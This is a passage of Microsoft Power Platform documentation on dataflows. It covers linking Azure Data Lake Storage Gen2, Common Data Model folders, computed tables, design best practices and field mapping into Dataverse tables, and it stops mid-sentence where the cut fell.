begin.

Prepare your Azure Data Lake Storage Gen2 for


Power Platform dataflows
Before you configure your environment with an Azure Data Lake Storage Gen2 account,
you must create and configure a storage account. Here are the requirements for Power
Platform dataflows:

1. The storage account must be created in the same Azure Active Directory tenant as
your Power Apps tenant.
2. We recommend that the storage account is created in the same region as the
Power Apps environment you plan to use it in. To determine where your Power
Apps environment is, contact your environment admin.
3. The storage account must have the Hierarchical Name Space feature enabled.
4. You must be granted an Owner role on the storage account.

The following sections walk through the steps necessary to configure your Azure Data
Lake Storage Gen2 account.

Create the storage account


Follow the steps in Create an Azure Data Lake Storage Gen2 storage account.

1. Make sure you select the same region as your environment and set your storage as
StorageV2 (general purpose v2).
2. Make sure you enable the hierarchical namespace feature.
3. We recommend that you set the replication setting to Read-access geo-redundant
storage (RA-GRS).

Connect your Azure Data Lake Storage Gen2 to


Power Apps
Once you've set up your Azure Data Lake Storage Gen2 account in the Azure portal,
you're ready to connect it to a specific dataflow or a Power Apps environment.
Connecting the lake to an environment allows other makers and admins in the
environment to create dataflows that store their data in your organization's lake as well.

To connect your Azure Data Lake Storage Gen2 account with the dataflow, follow these
steps:

1. Sign in to Power Apps , and verify which environment you're in. The environment
switcher is located on the right side of the header.

2. On the left navigation pane, select the down arrow next to Data.

3. In the list that appears, select Dataflows and then on the command bar select New
dataflow.

4. Select the analytical tables you want. These tables indicate what data you want to
store in your organization's Azure Data Lake Store Gen2 account.
Select the storage account to use for dataflow
storage
If a storage account hasn't yet been associated with the environment, a Link to data
lake dialog box appears. You'll need to sign in and find the data lake you created in the
previous steps. In this example, no data lake is associated with the environment and so a
prompt occurs to add one.

1. Select storage account.

The Select Storage Account screen appears.

2. Select the Subscription ID of the storage account.


3. Select the Resource group name in which the storage account was created.

4. Enter the Storage account name.

5. Select Save.

Once these steps are successfully completed, your Azure Data Lake Storage Gen2
account is connected to Power Platform Dataflows and you can continue to create a
dataflow.

Considerations and limitations


There are a few considerations and limitations to keep in mind when working with your
dataflow storage:

Linking an Azure Data Lake Store Gen2 account for dataflow storage isn't
supported in the default environment.
Once a dataflow storage location is configured for a dataflow, it can't be changed.
Once a storage account is linked, changing the environment's name isn't
supported and dataflows linked to the that storage account will fail. Changing back
the environment's name will re-enable those dataflows.
By default, any member of the environment can access dataflow data using the
Power Platform Dataflows Connector. However, only the owners of a dataflow can
access its files directly in Azure Data Lake Storage Gen2. To authorize more people
to access the dataflows data directly in the lake, you must authorize them to the
dataflow's CDM Folder in the data lake or the data lake itself.
When a dataflow is deleted, its CDM Folder in the lake will also be deleted.
Attempting to connect two dataflow entities between two workspaces of different
storage types—Bring Your Own Storage Account (BYOSA) and Internal—isn't
supported.

) Important

You shouldn't change files created by dataflows in your organization's lake or add
files to a dataflow's CDM Folder. Changing files might damage dataflows or alter
their behavior and is not supported. Power Platform Dataflows only grants read
access to files it creates in the lake. If you authorize other people or services to the
filesystem used by Power Platform Dataflows, only grant them read access to files
or folders in that filesystem.
Privacy notice
By enabling the creation of dataflows with Analytical tables in your organization, via the
Azure Synapse Link for Dataverse service, details about the Azure Data Lake storage
account, such as the name of the storage account, will be sent to and stored in the
Azure Synapse Link for Dataverse service, which is currently located outside the
PowerApps compliance boundary and may employ lesser or different privacy and
security measures than those typically in PowerApps. Note that you may remove the
data lake association at any time to discontinue use of this functionality and your Azure
Data Lake storage account details will be removed from the Azure Synapse Link for
Dataverse service. Further information about Azure Synapse Link for Dataverse is
available in this article.

Frequently asked questions


What if I had previously created dataflows in my organization's Azure Data Lake Storage
Gen2 and would like to change their storage location?

You can't change the storage location of a dataflow after it was created.

When can I change the dataflow storage location of an environment?

Changing the environment's dataflow storage location isn't currently supported.

Next steps
This article provided guidance about how to connect an Azure Data Lake Storage Gen2
account for dataflow storage.

For more information about dataflows, the Common Data Model, and Azure Data Lake
Storage Gen2, go to these articles:

Self-service data prep with dataflows


Creating and using dataflows in Power Apps
Add data to a table in Microsoft Dataverse

For more information about Azure storage, go to this article:

Azure Storage security guide

For more information about the Common Data Model, go to these articles:

Common Data Model - overview


Common Data Model folders
CDM model file definition

You can ask questions in the Power Apps Community .


What is the storage structure for
analytical dataflows?
Article • 08/04/2023

Analytical dataflows store both data and metadata in Azure Data Lake Storage.
Dataflows leverage a standard structure to store and describe data created in the lake,
which is called Common Data Model folders. In this article, you'll learn more about the
storage standard that dataflows use behind the scenes.

Storage needs a structure for an analytical


dataflow
If the dataflow is standard, then the data is stored in Dataverse. Dataverse is like a
database system; it has the concept of tables, views, and so on. Dataverse is a structured
data storage option used by standard dataflows.

However, when the dataflow is analytical, the data is stored in Azure Data Lake Storage.
A dataflow’s data and metadata is stored in a Common Data Model folder. Since a
storage account might have multiple dataflows stored in it, a hierarchy of folders and
subfolders has been introduced to help organize the data. Depending on the product
the dataflow was created in, the folders and subfolders may represent workspaces (or
environments), and then the dataflow’s Common Data Model folder. Inside the
Common Data Model folder, both schema and data of the dataflow tables are stored.
This structure follows the standards defined for Common Data Model.
What is the Common Data Model storage
structure?
Common Data Model is a metadata structure defined to bring conformity and
consistency for using data across multiple platforms. Common Data Model isn't data
storage, it's the way that data is stored and defined.

Common Data Model folders define how a table's schema and its data should be stored.
In Azure Data Lake Storage, data is organized in folders. Folders can represent a
workspace or environment. Under those folders, subfolders for each dataflow are
created.

What's in a dataflow folder?


Each dataflow folder contains a subfolder for each table and a metadata file named
model.json .

The metadata file: model.json


The model.json file is the metadata definition of the dataflow. This is the one file that
contains all the dataflow metadata. It includes a list of tables, the columns, and their
data types in each table, the relationship between tables, and so on. You can export this
file from a dataflow easily, even if you don't have access to the Common Data Model
folder structure.

You can use this JSON file to migrate (or import) your dataflow into another workspace
or environment.
To learn exactly what the model.json metadata file includes, go to The metadata file
(model.json) for Common Data Model.

Data files
In addition to the metadata file, the dataflow folder includes other subfolders. A
dataflow stores the data for each table in a subfolder with the table's name. Data for a
table might be split into multiple data partitions, stored in CSV format.

How to see or access Common Data Model


folders
If you're using dataflows that use storage provided by the product they were created in,
you won't have access to those folders directly. In such cases, getting data from the
dataflows requires using the Microsoft Power Platform dataflow connector available in
the Get data experience in the Power BI service, Power Apps, and Dynamics 35
Customer Insights products, or in Power BI Desktop.
To learn how dataflows and the internal Data Lake Storage integration work, go to
Dataflows and Azure Data Lake integration (Preview).

If your organization enabled dataflows to take advantage of its Data Lake Storage
account and was selected as a load target for dataflows, you can still get data from the
dataflow by using the Power Platform dataflow connector as mentioned above. But you
can also access the dataflow's Common Data Model folder directly through the lake,
even outside of Power Platform tools and services. Access to the lake is possible through
the Azure portal, Microsoft Azure Storage Explorer, or any other service or experience
that supports Azure Data Lake Storage. More information: Connect Azure Data Lake
Storage Gen2 for dataflow storage
Next steps
Use the Common Data Model to optimize Azure Data Lake Storage Gen2

The metadata file (model.json) for the Common Data Model

Add a CDM folder to Power BI as a dataflow (Preview)

Connect Azure Data Lake Storage Gen2 for dataflow storage

Dataflows and Azure Data Lake Integration (Preview)

Configure workspace dataflow settings (Preview)


Dataflow storage options
Article • 09/01/2022

Standard dataflows always load data into Dataverse tables in an environment. Analytical
dataflows always load data into Azure Data Lake Storage accounts. For both dataflow
types, there's no need to provision or manage the storage. Dataflow storage, by default,
is provided and managed by products the dataflow is created in.

Analytical dataflows allow an additional storage option: your organizations' Azure Data
Lake Storage account. This option enables access to the data created by a dataflow
directly through Azure Data Lake Storage interfaces. Providing your own storage
account for analytical dataflows enables other Azure or line-of-business applications to
leverage the data by connecting to the lake directly.

Dataflows that use built-in storage


By default, analytical dataflows will use the built-in Data Lake Storage; for example,
when you create a dataflow in Power BI or Power Apps. Access to the output of this type
of dataflow is only possible through the Microsoft Power Platform dataflows connector
in Power BI Desktop, or from other dataflows.

Dataflows that use customer-provided storage


Before creating a dataflow that uses your organization's Data Lake Storage account, you
must link the environment or workspace the dataflow was created in to your Data Lake
Storage account. Depending on which product dataflow you're using (Power BI or Power
Platform dataflows), the settings for connecting to an external Data Lake Storage
subscription is linked in different places.

Linking Power BI to your organization's Azure Data Lake


Storage
To configure Power BI dataflows to store data in your organization's Data Lake Storage,
you need to follow the steps described in Connect Azure Data Lake Storage Gen2 for
dataflow storage in the Power BI admin portal.
Linking a Power Platform environment to your
organization's Azure Data Lake Storage
To configure dataflows created in Power Apps to store data in your organization's Azure
Data Lake Storage, follow the steps in Connect Azure Data Lake Storage Gen2 for
dataflow storage in Power Apps.

Known limitations
After a dataflow is created, its storage location can't be changed.
Linked and computed entities features are only available when both dataflows are
in the same storage account.

The enhanced compute engine


In Power BI, in addition to the standard dataflow engine, an enhanced compute engine
is available for the dataflows created in Power BI Premium workspaces. You can
configure this setting in the Power BI admin portal, under the Premium capacity settings.
The enhanced compute engine is available in Premium P1 or A3 capacities and above.
The enhanced compute engine reduces the refresh time required for long-running
extract, transform, load (ETL) steps over computed entities, such as joins, distinct, filters,
and group by. It also provides the ability to perform DirectQuery over entities from the
Power BI dataset. More information: The enhanced compute engine

Next steps
The articles below provide further information that can be helpful.

Connect Azure Data Lake Storage Gen2 for dataflow storage (Power BI dataflows)
Connect Azure Data Lake Storage Gen2 for dataflow storage (Power Platform
dataflows)-->
Creating computed entities in dataflows
The enhanced compute engine
Understanding the differences between standard and analytical dataflows
Computed table scenarios and use cases
Article • 08/04/2023

There are benefits to using computed tables in a dataflow. This article describes use
cases for computed tables and describes how they work behind the scenes.

What is a computed table?


A table represents the data output of a query created in a dataflow, after the dataflow
has been refreshed. It represents data from a source and, optionally, the transformations
that were applied to it. Sometimes, you might want to create new tables that are a
function of a previously ingested table.

Although it's possible to repeat the queries that created a table and apply new
transformations to them, this approach has drawbacks: data is ingested twice, and the
load on the data source is doubled.

Computed tables solve both problems. Computed tables are similar to other tables in
that they get data from a source and you can apply further transformations to create
them. But their data originates from the storage dataflow used, and not the original data
source. That is, they were previously created by a dataflow and then reused.

Computed tables can be created by referencing a table in the same dataflow or by


referencing a table created in a different dataflow.

Why use a computed table?


Performing all transformation steps in one table can be slow. There can be many
reasons for this slowdown—the data source might be slow, or the transformations that
you're doing might need to be replicated in two or more queries. It might be
advantageous to first ingest the data from the source and then reuse it in one or more
tables. In such cases, you might choose to create two tables: one that gets data from the
data source, and another—a computed table—that applies more transformations to
data already written into the data lake used by a dataflow. This change can increase
performance and reusability of data, saving time and resources.

For example, if two tables share even a part of their transformation logic, without a
computed table, the transformation has to be done twice.
However, if a computed table is used, then the common (shared) part of the
transformation is processed once and stored in Azure Data Lake Storage. The remaining
transformations are then be processed from the output of the common transformation.
Overall, this processing is much faster.

A computed table provides one place as the source code for the transformation and
speeds up the transformation because it only needs to be done once instead of multiple
times. The load on the data source is also reduced.

Example scenario for using a computed table


If you're building an aggregated table in Power BI to speed up the data model, you can
build the aggregated table by referencing the original table and applying more
transformations to it. By using this approach, you don't need to replicate your
transformation from the source (the part that is from the original table).

For example, the following figure shows an Orders table.

Using a reference from this table, you can build a computed table.

The computed table can have further transformations. For example, you can use Group
By to aggregate the data at the customer level.
This means that the Orders Aggregated table is getting data from the Orders table, and
not from the data source again. Because some of the transformations that need to be
done have already been done in the Orders table, performance is better and data
transformation is faster.

Computed table in other dataflows


You can also create a computed table in other dataflows. It can be created by getting
data from a dataflow with the Microsoft Power Platform dataflow connector.
The concept of the computed table is to have a table persisted in storage, and other
tables sourced from it, so that you can reduce the read time from the data source and
share some of the common transformations. This reduction can be achieved by getting
data from other dataflows through the dataflow connector or referencing another query
in the same dataflow.

Computed table: With transformations, or


without?
Now that you know computed tables are great for improving performance of the data
transformation, a good question to ask is whether transformations should always be
deferred to the computed table or whether they should be applied to the source table.
That is, should data always be ingested into one table and then transformed in a
computed table? What are the pros and cons?

Load data without transformation for Text/CSV files


When a data source doesn't support query folding (such as Text/CSV files), there's little
benefit in applying transformations when getting data from the source, especially if data
volumes are large. The source table should just load data from the Text/CSV file without
applying any transformations. Then, computed tables can get data from the source table
and perform the transformation on top of the ingested data.

You might ask, what's the value of creating a source table that only ingests data? Such a
table can still be useful, because if the data from the source is used in more than one
table, it reduces the load on the data source. In addition, data can now be reused by
other people and dataflows. Computed tables are especially useful in scenarios where
the data volume is large, or when a data source is accessed through an on-premises
data gateway, because they reduce the traffic from the gateway and the load on data
sources behind them.

Doing some of the common transformations for a SQL


table
If your data source supports query folding, it's good to perform some of the
transformations in the source table because the query is folded to the data source, and
only the transformed data is fetched from it. These changes improve overall
performance. The set of transformations that is common in downstream computed
tables should be applied in the source table, so they can be folded to the source. Other
transformations that only apply to downstream tables should be done in computed
tables.
Best practices for designing and
developing complex dataflows
Article • 08/04/2023

If the dataflow you're developing is getting bigger and more complex, here are some
things you can do to improve on your original design.

Break it into multiple dataflows


Don't do everything in one dataflow. Not only does a single, complex dataflow make the
data transformation process longer, it also makes it harder to understand and reuse the
dataflow. Breaking your dataflow into multiple dataflows can be done by separating
tables in different dataflows, or even one table into multiple dataflows. You can use the
concept of a computed table or linked table to build part of the transformation in one
dataflow, and reuse it in other dataflows.

Split data transformation dataflows from


staging/extraction dataflows
Having some dataflows just for extracting data (that is, staging dataflows) and others
just for transforming data is helpful not only for creating a multilayered architecture, it's
also helpful for reducing the complexity of dataflows. Some steps just extract data from
the data source, such as get data, navigation, and data type changes. By separating the
staging dataflows and transformation dataflows, you make your dataflows simpler to
develop.
Use custom functions
Custom functions are helpful in scenarios where a certain number of steps have to be
done for a number of queries from different sources. Custom functions can be
developed through the graphical interface in Power Query Editor or by using an M
script. Functions can be reused in a dataflow in as many tables as needed.

Having a custom function helps by having only a single version of the source code, so
you don't have to duplicate the code. As a result, maintaining the Power Query
transformation logic and the whole dataflow is much easier. For more information, go to
the following blog post: Custom Functions Made Easy in Power BI Desktop .

7 Note

Sometimes you might receive a notification that tells you a premium capacity is
required to refresh a dataflow with a custom function. You can ignore this message
and reopen the dataflow editor. This usually solves your problem unless your
function refers to a "load enabled" query.

Place queries into folders


Using folders for queries helps to group related queries together. When developing the
dataflow, spend a little more time to arrange queries in folders that make sense. Using
this approach, you can find queries more easily in the future and maintaining the code is
much easier.

Use computed tables


Computed tables not only make your dataflow more understandable, they also provide
better performance. When you use a computed table, the other tables referenced from
it are getting data from an "already-processed-and-stored" table. The transformation is
much simpler and faster.

Take advantage of the enhanced compute


engine
For dataflows developed in Power BI admin portal, ensure that you make use of the
enhanced compute engine by performing joins and filter transformations first in a
computed table before doing other types of transformations.

Break many steps into multiple queries


It's hard to keep track of a large number of steps in one table. Instead, you should break
a large number of steps into multiple tables. You can use Enable Load for other queries
and disable them if they're intermediate queries, and only load the final table through
the dataflow. When you have multiple queries with smaller steps in each, it's easier to
use the dependency diagram and track each query for further investigation, rather than
digging into hundreds of steps in one query.

Add properties for queries and steps


Documentation is the key to having easy-to-maintain code. In Power Query, you can
add properties to the tables and also to steps. The text that you add in the properties
shows up as a tooltip when you hover over that query or step. This documentation helps
you maintain your model in the future. With a glance at a table or step, you can
understand what's happening there, rather than rethinking and remembering what
you've done in that step.

Ensure that capacity is in the same region


Dataflows don't currently support multiple countries or regions. The Premium capacity
must be in the same region as your Power BI tenant.

Separate on-premises sources from cloud


sources
We recommend that you create a separate dataflow for each type of source, such as on-
premises, cloud, SQL Server, Spark, and Dynamics 365. Separating dataflows by source
type facilitates quick troubleshooting and avoids internal limits when you refresh your
dataflows.

Separate dataflows based on the scheduled


refresh required for tables
If you have a sales transaction table that gets updated in the source system every hour
and you have a product-mapping table that gets updated every week, break these two
tables into two dataflows with different data refresh schedules.

Avoid scheduling refresh for linked tables in


the same workspace
If you're regularly being locked out of your dataflows that contain linked tables, it might
be caused by a corresponding, dependent dataflow in the same workspace that's locked
during dataflow refresh. Such locking provides transactional accuracy and ensures that
both dataflows are successfully refreshed, but it can block you from editing.

If you set up a separate schedule for the linked dataflow, dataflows can be refreshed
unnecessarily and block you from editing the dataflow. There are two recommendations
to avoid this problem:

Don't set a refresh schedule for a linked dataflow in the same workspace as the
source dataflow.
If you want to configure a refresh schedule separately and want to avoid the
locking behavior, move the dataflow to a separate workspace.
Best practices for reusing dataflows
across environments and workspaces
Article • 08/04/2023

This article discusses a collection of best practices for reusing dataflows effectively and
efficiently. Read this article to avoid design pitfalls and potential performance issues as
you develop dataflows for reuse.

Separate data transformation dataflows from


staging/extraction dataflows
If a dataflow performs all the actions, it's hard to reuse its tables in other dataflows or
for other purposes. The best dataflows to reuse are those dataflows that do only a few
actions. Creating dataflows that specialize in one specific task is one of the best ways to
reuse them. If you have a set of dataflows that you use as staging dataflows, their only
action is to extract data as-is from the source system. These dataflows can be reused in
multiple other dataflows.

If you have data transformation dataflows, you can split them into dataflows that do
common transformations. Each dataflow can do just a few actions. These few actions per
dataflow ensure that the output of that dataflow is reusable by other dataflows.

Use multiple workspaces


Each workspace (or environment) is available only for members of that workspace. If you
build all your dataflows in one workspace, you're minimizing the reuse of your
dataflows. You can have some generic workspaces for dataflows that are processing
company-wide tables. You can also have some workspace for dataflows to process
tables across multiple departments. And you can also have some workspaces for
dataflows to be used only in specific departments.

Set the correct access levels on workspaces


To give access to dataflows in other workspaces to use the output of a dataflow in a
workspace, you just need to give them View access in the workspace. To learn more
about other roles in a Power BI workspace, go to Roles in the new workspaces.
Endorsement on the dataflow in Power BI
There can be many dataflows created in a tenant organization, and it can be hard for the
users to know which dataflow is most reliable. Authors of a dataflow, or those users who
have edit access to it, can endorse the dataflow at three levels: no endorsement,
promoted, or certified.

These levels of endorsement help users find reliable dataflows easier and faster. The
dataflow with a higher endorsement level appears first. The Power BI administrator can
delegate the ability to endorse dataflows to the certified level to other people. More
information: Endorsement - Promoting and certifying Power BI content
Separate tables in multiple dataflows
You can have multiple tables in one dataflow. One of the reasons you might split tables
in multiple dataflows is what you learned earlier in this article about separating the data
ingestion and data transformation dataflows. Another good reason to have tables in
multiple dataflows is when you want a different refresh schedule than other tables.

In the example shown in the following image, the sales table needs to be refreshed
every four hours. The date table needs to be refreshed only once a day to keep the
current date record updated. And a product-mapping table just needs to be refreshed
once a week. If you have all of these tables in one dataflow, you have only one refresh
option for them all. However, if you split these tables into multiple dataflows, you can
schedule the refresh of each dataflow separately.
Good table candidates for dataflow tables
When you develop solutions using Power Query in the desktop tools, you might ask
yourself; which of these tables are good candidates to be moved to a dataflow? The best
tables to be moved to the dataflow are those tables that need to be used in more than
one solution, or more than one environment or service. For example, the Date table
shown in the following image needs to be used in two separate Power BI files. Instead of
duplicating that table in each file, you can build the table in a dataflow as a table, and
reuse it in those Power BI files.
Best practices for creating a dimensional
model using dataflows
Article • 08/04/2023

Designing a dimensional model is one of the most common tasks you can do with a
dataflow. This article highlights some of the best practices for creating a dimensional
model using a dataflow.

Staging dataflows
One of the key points in any data integration system is to reduce the number of reads
from the source operational system. In the traditional data integration architecture, this
reduction is done by creating a new database called a staging database. The purpose of
the staging database is to load data as-is from the data source into the staging
database on a regular schedule.

The rest of the data integration will then use the staging database as the source for
further transformation and converting it to the dimensional model structure.

We recommended that you follow the same approach using dataflows. Create a set of
dataflows that are responsible for just loading data as-is from the source system (and
only for the tables you need). The result is then stored in the storage structure of the
dataflow (either Azure Data Lake Storage or Dataverse). This change ensures that the
read operation from the source system is minimal.

Next, you can create other dataflows that source their data from staging dataflows. The
benefits of this approach include:

Reducing the number of read operations from the source system, and reducing the
load on the source system as a result.
Reducing the load on data gateways if an on-premises data source is used.
Having an intermediate copy of the data for reconciliation purpose, in case the
source system data changes.
Making the transformation dataflows source-independent.
Transformation dataflows
When you've separated your transformation dataflows from the staging dataflows, the
transformation will be independent from the source. This separation helps if you're
migrating the source system to a new system. All you need to do in that case is to
change the staging dataflows. The transformation dataflows are likely to work without
any problem, because they're sourced only from the staging dataflows.

This separation also helps in case the source system connection is slow. The
transformation dataflow won't need to wait for a long time to get records coming
through a slow connection from the source system. The staging dataflow has already
done that part, and the data will be ready for the transformation layer.
Layered Architecture
A layered architecture is an architecture in which you perform actions in separate layers.
The staging and transformation dataflows can be two layers of a multi-layered dataflow
architecture. Trying to do actions in layers ensures the minimum maintenance required.
When you want to change something, you just need to change it in the layer in which
it's located. The other layers should all continue to work fine.

The following image shows a multi-layered architecture for dataflows in which their
tables are then used in Power BI datasets.
Use a computed table as much as possible
When you use the result of a dataflow in another dataflow, you're using the concept of
the computed table, which means getting data from an "already-processed-and-stored"
table. The same thing can happen inside a dataflow. When you reference an table from
another table, you can use the computed table. This is helpful when you have a set of
transformations that need to be done in multiple tables, which are called common
transformations.

In the previous image, the computed table gets the data directly from the source.
However, in the architecture of staging and transformation dataflows, it's likely that the
computed tables are sourced from the staging dataflows.
Build a star schema
The best dimensional model is a star schema model that has dimensions and fact tables
designed in a way to minimize the amount of time to query the data from the model,
and also makes it easy to understand for the data visualizer.

It isn't ideal to bring data in the same layout of the operational system into a BI system.
The data tables should be remodeled. Some of the tables should take the form of a
dimension table, which keeps the descriptive information. Some of the tables should
take the form of a fact table, to keep the aggregatable data. The best layout for fact
tables and dimension tables to form is a star schema. More information: Understand star
schema and the importance for Power BI
Use a unique key value for dimensions
When building dimension tables, make sure you have a key for each one. This key
ensures that there are no many-to-many (or in other words, "weak") relationships
among dimensions. You can create the key by applying some transformation to make
sure a column or a combination of columns is returning unique rows in the dimension.
Then that combination of columns can be marked as a key in the table in the dataflow.
Do an incremental refresh for large fact tables
Fact tables are always the largest tables in the dimensional model. We recommend that
you reduce the number of rows transferred for these tables. If you have a very large fact
table, ensure that you use incremental refresh for that table. An incremental refresh can
be done in the Power BI dataset, and also the dataflow tables.

You can use incremental refresh to refresh only part of the data, the part that has
changed. There are multiple options to choose which part of the data to be refreshed
and which part to be persisted. More information: Using incremental refresh with Power
BI dataflows

Referencing to create dimensions and fact


tables
In the source system, you often have a table that you use for generating both fact and
dimension tables in the data warehouse. These tables are good candidates for
computed tables and also intermediate dataflows. The common part of the process—
such as data cleaning, and removing extra rows and columns—can be done once. By
using a reference from the output of those actions, you can produce the dimension and
fact tables. This approach will use the computed table for the common transformations.
Improve performance and reusability by
separating data ingestion from data
transformation dataflows
Article • 02/17/2023

One of the best practices for dataflow implementations is separating the responsibilities
of dataflows into two layers: data ingestion and data transformation. This pattern is
specifically helpful when dealing with multiple queries of slower data sources in one
dataflow, or multiple dataflows querying the same data sources. Instead of getting data
from a slow data source again and again for each query, the data ingestion process can
be done once, and the transformation can be done on top of that process. This article
explains the process.

On-premises data source


In many scenarios, the on-premises data source is a slow data source. Especially
considering that the gateway exists as the middle layer between the dataflow and the
data source.
Using analytical dataflows for data ingestion minimizes the get data process from the
source and focuses on loading data to Azure Data Lake Storage. Once in storage, other
dataflows can be created that leverage the ingestion dataflow's output. The dataflow
engine can read the data and do the transformations directly from the data lake,
without contacting the original data source or gateway.
Slow data source
The same process is valid when a data source is slow. Some of the software as a service
(SaaS) data sources perform slowly because of the limitations of their API calls.

Separation of the data ingestion and data


transformation dataflows
The separation of the two layers—data ingestion and transformation—is helpful in the
scenarios where the data source is slow. It helps to minimize the interaction with the
data source.

This separation isn't only useful because of the performance improvement, it's also
helpful for the scenarios where an old legacy data source system has been migrated to a
new system. In those cases, only the data ingestion dataflows need to be changed. The
data transformation dataflows remain intact for this type of change.
Reuse in other tools and services
Separation of data ingestion dataflows from data transformation dataflows is helpful in
many scenarios. Another use case scenario for this pattern is when you want to use this
data in other tools and services. For this purpose, it's better to use analytical dataflows
and use your own Data Lake Storage as the storage engine. More information: Analytical
dataflows

Optimize the data ingestion dataflow


Consider optimizing the data ingestion dataflow whenever possible. As an example, if all
the data from the source isn't needed, and the data source supports query folding, then
filtering data and getting only a required subset is a good approach. To learn more
about query folding, go to Power Query query folding.
Create the data ingestion dataflows as
analytical dataflows
Consider creating your data ingestion dataflows as analytical dataflows. This especially
helps other services and applications to use this data. This also makes it easier for the
data transformation dataflows to get data from the analytical ingestion dataflow. To
learn more, go to Analytical dataflows.
Using the output of Microsoft Power
Platform dataflows from other Azure
data workloads
Article • 02/17/2023

Depending on the storage for the output of the Microsoft Power Platform dataflows,
you can use that output in other Azure services.

The benefits of working with the output of


Power Platform dataflows
Using Power Platform dataflows, you can reshape, clean, and prepare data for further
analysis and consumption. There are many other Azure data services that work with data
as an input and provide actions.

Azure Machine Learning can consume the output of dataflows and use it for
machine learning scenarios (for example, predictive analysis).
Azure Data Factory can get the output of dataflows on a much larger scale,
combined with the data from big data sources, for advanced data integration
solutions.
Azure Databricks can consume the output of dataflows for applied data science
algorithms and further AI with the big data scale in the Apache Spark back end.
Other Azure data services can use the output of Power Platform dataflows to do
further actions on that data.

Dataflows with external Azure Data Lake


Storage
If you've connected an external Azure Data Lake Storage storage to the Power Platform
dataflows, you can connect to it using any Azure services that have Azure Data Lake
Storage as a source, such as Azure Machine Learning, Azure Data Factory, Azure
Databricks, and Azure Analysis Services.

In any of these services, use Azure Data Lake Storage as the source. You'll be able to
enter the details of your storage and connect to the data in it. The data is stored in CSV
format, and is readable through any of these tools and services. The following
screenshot shows how Azure Data Lake Storage is a source option for Azure Data
Factory.

Dataflows with Dataverse


If you're using standard dataflows that store the data in Dataverse, you can still connect
to Dataverse from many Azure services. The following image shows that in Azure Data
Factory, the output of a dataflow from Dataverse can be used as a source.

Dataflows with internal Azure Data Lake


Storage
When you use the internal Data Lake storage that's provided by Power Platform
dataflows, that storage is exclusively limited to the Power Platform tools and isn't
accessible from other Azure data workloads.
Mapping fields with relationships in
standard dataflows
Article • 06/20/2023

In the standard dataflow, you can easily map fields from the dataflow query into
Dataverse tables. However, if the Dataverse table has lookup or relationship fields,
additional consideration is required to make sure this process works.

What is the relationship and why do you need


that?
If you're coming from a database development background, you're familiar with the
concept of a relationship between tables. However, many users of Microsoft Power
Platform services aren't coming from that background. You might wonder what the
relationship is, or why you should create a relationship between tables.

The tables and their relationship are fundamental concepts of designing a database. To
learn everything about relationships is beyond the scope of this article. However, we'll
discuss it in a general way here.

Let's say you want to store information about customers and their details, including
region, in Dataverse. You can keep everything in one table. Your table can be called
Customers, and it can contain fields, such as CustomerID, Name, Birthdate, and Region.
Now imagine that you have another table that also has the store's information. This
table can have fields, such as Store ID, Name, and Region. As you can see, the region is
repeated in both tables. There's no single place where you can get all regions; some of
the region's data is in the Customers table, and some of it's in the Stores table. If you
ever build an application or a report from this information, you always have to combine
the two regions' information into one.
What's done in the database design practice is to create a table for Region in scenarios
like the one described above. This Region table would have a Region ID, Name, and
other information about the region. The other two tables (Customers and Stores) will
have links to this table using a field (which can be Region ID if we have the ID in both
tables, or Name if it's unique enough to determine a region). This means having a
relationship from the Stores and Customers table to the Region table.

In Dataverse, there are a number of ways to create a relationship. One way is to create a
table, and then create a field in one table that's a relationship (or lookup) to another
table, as described in the next section.

What are lookup or relationship fields?


In Dataverse, you can have a field defined as a lookup field, which points to another
table.
In the preceding image, the Region field is a lookup field to another table named Region
Lookup. To learn more about different types of relationships, go to Create a relationship
between tables.

When the field mapping doesn't show the


relationship fields
If you've created a lookup field in one table that points to another table, that field might
not appear in the mapping of the dataflow. That’s because the target entity involved in
the relationship requires a Key field to be defined. This best practice would then make
sure that the field is mappable in the table mappings of the dataflow.
Setting the Key field in the table
To set the key field in the table, go to the Keys tab, and add a key to a field that has
unique values.

After setting the key field, you can see the field in the mapping of the dataflow.

Known limitations
Mapping to polymorphic lookup fields is currently not supported.
Mapping to a multi-level lookup field, a lookup that points to another tables'
lookup field, is currently not supported.
Lookup fields for Standard Tables, unless they contain alternate key fields as
described in this document, won't show up in the Map Tables dialog.
Dataflows don't guarantee correct loading order when loading data to tables
configured as hierarchical data structures.
The order of query execution, or loading order to Dataverse tables isn't
guaranteed. We recommend that you separate child and parent tables into two
dataflows, and first refresh the dataflow containing child artifacts.
Field mapping considerations for
standard dataflows
Article • 06/20/2023

When loading data into Dataverse tables, you'll need to map the source query's columns
in the dataflow's editing experience to the destination Dataverse table columns. Beyond
mapping of data, there are other considerations and best practices to take into account.
In this article, we cover the different dataflow settings that control the behavior of
dataflow refresh and as a result, the data in the destination table.

Controlling whether dataflows create or upsert


records each refresh
Each time you refresh a dataflow, it will fetch records from the source and load them
into Dataverse. If you run the dataflow more than once—depending on how you
configure the dataflow—you can:

Create new records each dataflow refresh, even if such records already exist in the
destination table.
Create new records if they don't already exist in the table, or update existing
records if they already exist in the table. This behavior is called upsert.

Using a key column will indicate to the dataflow to upsert records into the destination
table, while not selecting a key will always create new records in the destination table.

A key column is a column that's unique and deterministic of a data row in the table. For
example, in an Orders table, if the Order ID is a key column, you shouldn't have two
rows with the same Order ID. Also, one Order ID—let's say an order with the ID 345—
should only represent one row in the table. To choose the key column for the table in
Dataverse from the dataflow, you need to set the key field in the Map Tables experience.

Choosing a primary name and key field when creating a


new table
The following image shows how you can choose the key column to be populated from
the source when you create a new table in the dataflow.
The primary name field that you see in the field mapping is for a label field; this field
doesn't need to be unique. The field that's used in the table for checking duplication will
be the field that you set in the Alternate Key field.

Having a primary key in the table ensures that even if you have duplicate data rows with
the same value in the field that's mapped to the primary key, the duplicate entries won't
be loaded into the table, and the table will always have a high quality of the data.
Having a table with a high quality of data is essential in building reporting solutions
based on the table.

The primary name field


The primary name field is a display field used in Dataverse. This field is used in default
views to show the content of the table in other applications. This field isn't the primary
key field, and shouldn't be considered as that. This field can have duplicates, because it's
a display field. The best practice, however, is to use a concatenated field to map to the
primary name field, so the name is fully explanatory.

The alternate key field is what is used as the primary key.

Choosing a key field when loading to an existing table


When mapping a dataflow query to an existing Dataverse table, you can choose if and
which key should be used when loading data into the destination table.

The following image shows how you can choose the key column to be used when
upserting records to an existing Dataverse table:


Setting a table’s Unique ID column and using it as a key
field for upserting records into existing Dataverse tables
All Microsoft Dataverse table rows have unique identifiers defined as GUIDs. These
GUIDs are the primary key for each table. By default, a tables primary key can't be set by
dataflows, and is auto-generated by Dataverse when a record is created. There are
